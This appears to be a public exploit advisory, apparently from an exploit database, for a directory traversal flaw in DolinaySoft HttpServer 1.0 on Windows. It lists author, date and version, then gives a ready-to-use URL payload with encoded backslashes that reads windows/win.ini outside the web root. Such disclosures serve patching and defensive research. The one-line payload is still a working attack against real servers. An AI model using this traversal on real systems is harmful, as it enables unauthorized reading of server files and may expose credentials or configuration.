14 lines
No EOL
485 B
Text
14 lines
No EOL
485 B
Text
# Exploit Title: HttpServer 1.0 DolinaySoft Directory Traversal
|
|
# Date: 2017-03-19
|
|
# Exploit Author: malwrforensics
|
|
# Software Link: http://www.softpedia.com/get/Internet/Servers/WEB-Servers/HttpServer.shtml#download
|
|
# Version: 1.0
|
|
# Tested on: Windows
|
|
|
|
Exploiting this issue will allow an attacker to view arbitrary files
|
|
within the context of the web server.
|
|
|
|
Example:
|
|
Assuming the root folder is c:\<app_folder>\<html_folder>
|
|
|
|
http://<server>/..%5c..%5c/windows/win.ini |